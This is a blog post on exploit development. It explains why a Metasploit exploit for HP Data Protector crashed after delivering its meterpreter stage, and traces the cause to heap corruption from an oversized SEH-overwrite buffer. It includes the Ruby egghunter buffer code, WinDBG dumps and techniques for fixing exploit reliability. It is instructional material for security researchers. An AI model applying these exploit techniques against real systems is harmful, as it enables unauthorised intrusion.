Last updated at Wed, 27 Sep 2017 02:27:50 GMT
Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) did a presentation about "Long Beard's Guide to Exploit Dev". During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth! But here's the thing, exploits don't just fail before you pop a shell, it can also happen WHILE you're getting a shell... and that's where my story is.
Let's say you're writing an exploit. You've done all the hard work to put it all together: you spent days in a debugger trying to do some decent root cause analysis for the bug, find all the bad characters, you bypass all the memory protections such as /GS, SafeSEH, you ROP it like a ROP star, and you bypass ASLR like a boss. Your friends praise you for the accomplishment, some people might even call your exploit "sophisticated".... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:
msf exploit(0day) > exploit
[*] Server started.
[*] Sending request to 10.0.1.4:80...
[*] Leaked address: 0x61990000
[*] Sending final payload...
[*] Sending stage (752128 bytes) to 10.0.1.4
"Hey, WTH?", you say. For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior). You fire the module a couple of times just to make sure, but same thing. Your shell keeps slipping away from your fingertips... what a nightmare! This is a pretty nasty problem, because the root cause most likely comes from the exploit. It also can be a hassle to fix, and you will see why when you see one of the solutions in the end. But for now, I should probably explain why this is happening.
We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case-study. During the later stage of the development of that module, the buffer was crafted this way:
print_status("Using egghunter with checksum")
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })
my_payload = egg
my_payload << "A"*(target['Offset']-my_payload.length)
my_payload << generate_seh_record(target.ret)
my_payload << hunter
my_payload << "A"*(4080-my_payload.length)
As you can see, the max buffer size is 4080 bytes -- this is key. And then when we fire up this module, we'd see the same stage delivering message, and then hit this bug:
0:008> r
eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4
eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!RtlQueryProcessHeapInformation+0x2ba:
7c952d6b 8b4e14 mov ecx,dword ptr [esi+14h] ds:0023:3743fddd=????????
0:008> k
ChildEBP RetAddr
019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation+0x2ba
019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation+0x1ee
019ed36c 03bd7e23 kernel32!Heap32First+0x48
WARNING: Frame IP not in any known module. Following frames may be wrong.
019edc2c 7c802600 +0x3bd7e22
019edc7c 00000000 kernel32!WaitForSingleObjectEx+0xd8
We should probably point out that ESI is actually a string that's user-supplied. We were able to determine this, because when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the string... exactly 38 bytes after the egghunter. So the above WinDBG log shows that after the staged payload delivery, there is some sort of heap corruption, and evidently our string has something to do with that.
Remember, this buffer overflow is supposed to be all stack smashing. But as we examine the memory more closely by doing a non-crashy request vs the crashy one, we found something interesting. The following is the memory dump starting where the SEH is (that we overwrite):
Stack from the healthy version of the exploit****Stack from the non-healthy version of the exploit
Stack from the healthy version of the exploit | Stack from the non-healthy version of the exploit |
---|---|
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler 0244ffa4 ffca8166 0244ffa8 6a52420f 0244ffac 2ecd5802 0244ffb0 745a053c 0244ffb4 3077b8ef 0244ffb8 d7897430 0244ffbc afea75af 0244ffc0 3151e775 0244ffc4 02c031c9 0244ffc8 66410f04 0244ffcc 013df981 0244ffd0 043af575 0244ffd4 d175590f 0244ffd8 3077e7ff 0244ffdc ff007430 0244ffe0 7c839ac0 kernel32!_except_handler3 0244ffe4 7c80b720 kernel32!`string'+0x88 0244ffe8 00000000 0244ffec 00000000 0244fff0 00000000 0244fff4 1022db2c dpwinsup!Mbcsisupper+0x21d627 0244fff8 019d75a0 0244fffc 00000000 Stack 02450000 000000c1 starting here is the heap 02450004 0000017a 02450008 eeffeeff 0245000c 00001003 02450010 00000001 02450014 0000fe00 02450018 00100000 0245001c 00002000 02450020 00000200 02450024 00002000 02450028 00001f6d 0245002c 7ffdefff 02450030 06080019 |
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler 0244ffa4 ffca8166 0244ffa8 6a52420f 0244ffac 2ecd5802 0244ffb0 745a053c 0244ffb4 3077b8ef 0244ffb8 d7897430 0244ffbc afea75af 0244ffc0 3151e775 0244ffc4 02c031c9 0244ffc8 66410f04 0244ffcc 013df981 0244ffd0 043af575 0244ffd4 d175590f 0244ffd8 41414141 0244ffdc 41414141 0244ffe0 41414141 0244ffe4 41414141 0244ffe8 00000000 0244ffec 00000000 0244fff0 00000000 0244fff4 41414141 0244fff8 41414141 0244fffc 04141414 Still stack 02450000 41414141 starting here is the heap 02450004 41414141 02450008 41414141 0245000c 41414141 02450010 41414141 02450014 41414141 02450018 41414141 0245001c 41414141 02450020 41414141 02450024 41414141 02450028 41414141 0245002c 41414141 02450030 41414141 |
In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap. A simple !address command verifies this:
0:010> !address 0244fffc
02350000 : 02440000 - 00010000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageStack
Pid.Tid 69a0.6ac4
0:010> !address 02450000
02450000 : 02450000 - 00016000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 02450000
And clearly, the dt command shows what the corrupt heap structure 0x02450000 looks like:
0:010> dt _HEAP 02450000
ntdll!_HEAP
+0x000 Entry : _HEAP_ENTRY
+0x008 Signature : 0x41414141
+0x00c Flags : 0x41414141
+0x010 ForceFlags : 0x41414141
+0x014 VirtualMemoryThreshold : 0x41414141
+0x018 SegmentReserve : 0x41414141
+0x01c SegmentCommit : 0x41414141
+0x020 DeCommitFreeBlockThreshold : 0x41414141
+0x024 DeCommitTotalFreeThreshold : 0x41414141
+0x028 TotalFreeSize : 0x41414141
+0x02c MaximumAllocationSize : 0x41414141
+0x030 ProcessHeapsListIndex : 0x4141
+0x032 HeaderValidateLength : 0x4141
+0x034 HeaderValidateCopy : 0x41414141
+0x038 NextAvailableTagIndex : 0x4141
+0x03a MaximumTagIndex : 0x4141
+0x03c TagEntries : 0x41414141 _HEAP_TAG_ENTRY
+0x040 UCRSegments : 0x41414141 _HEAP_UCR_SEGMENT
+0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE
+0x048 AlignRound : 0x41414141
+0x04c AlignMask : 0x41414141
+0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
+0x058 Segments : [64] 0x41414141 _HEAP_SEGMENT
+0x158 u : __unnamed
+0x168 u2 : __unnamed
+0x16a AllocatorBackTraceIndex : 0x4141
+0x16c NonDedicatedListLength : 0x41414141
+0x170 LargeBlocksIndex : 0x41414141
+0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY
+0x178 FreeLists : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
+0x578 LockVariable : (null)
+0x57c CommitRoutine : (null)
+0x580 FrontEndHeap : (null)
+0x584 FrontHeapLockCount : 0
+0x586 FrontEndHeapType : 0 ''
+0x587 LastSegmentIndex : 0 ''
When the payload uses the heap, that's when we get the crash. Based on our data, this crash tends to happen after the handler complets transmitting the payload (that's after recv), and then when the Tool Help Functions ends up using the bad heap (CreateToolHelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our meterpreter to crash. We have also seen other behaviors that lead to the crash, but not too far off from the same reason.
The Solutions
Now we know for scenarios like this, the user-supplied buffer is highly likely the root cause of the problem. In our case with HP Data Protector, the string is just way to long, and it's overwriting the heap. We have seen a few proven solutions in the past, and here they are:
- Avoid corrupting the heap by reducing your malicious string size. This should be the most simple way you should try first, but may not always work well for you because a smaller size buffer may not even trigger the vulnerability you're exploiting.
- Inject your payload somewhere else, where no heap is busted. So far this technique has only been used once, and it was done by corelanc0d3r and lincoln. This is similar to using the 'migrate' feature in a meterpreter, except their injection routine occurs before the actual Metasploit payload begins. You can read up more about this technique here.
- Induce a heap pointer manually, for example: ms04_011_pct.rb
And hopefully one of the above recommendations will do the trick for you.
By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project. Github and Redmine often reveal a lot about how a module is made, and every exploit always tends to be an unique story -- great places to begin your exploit development journey!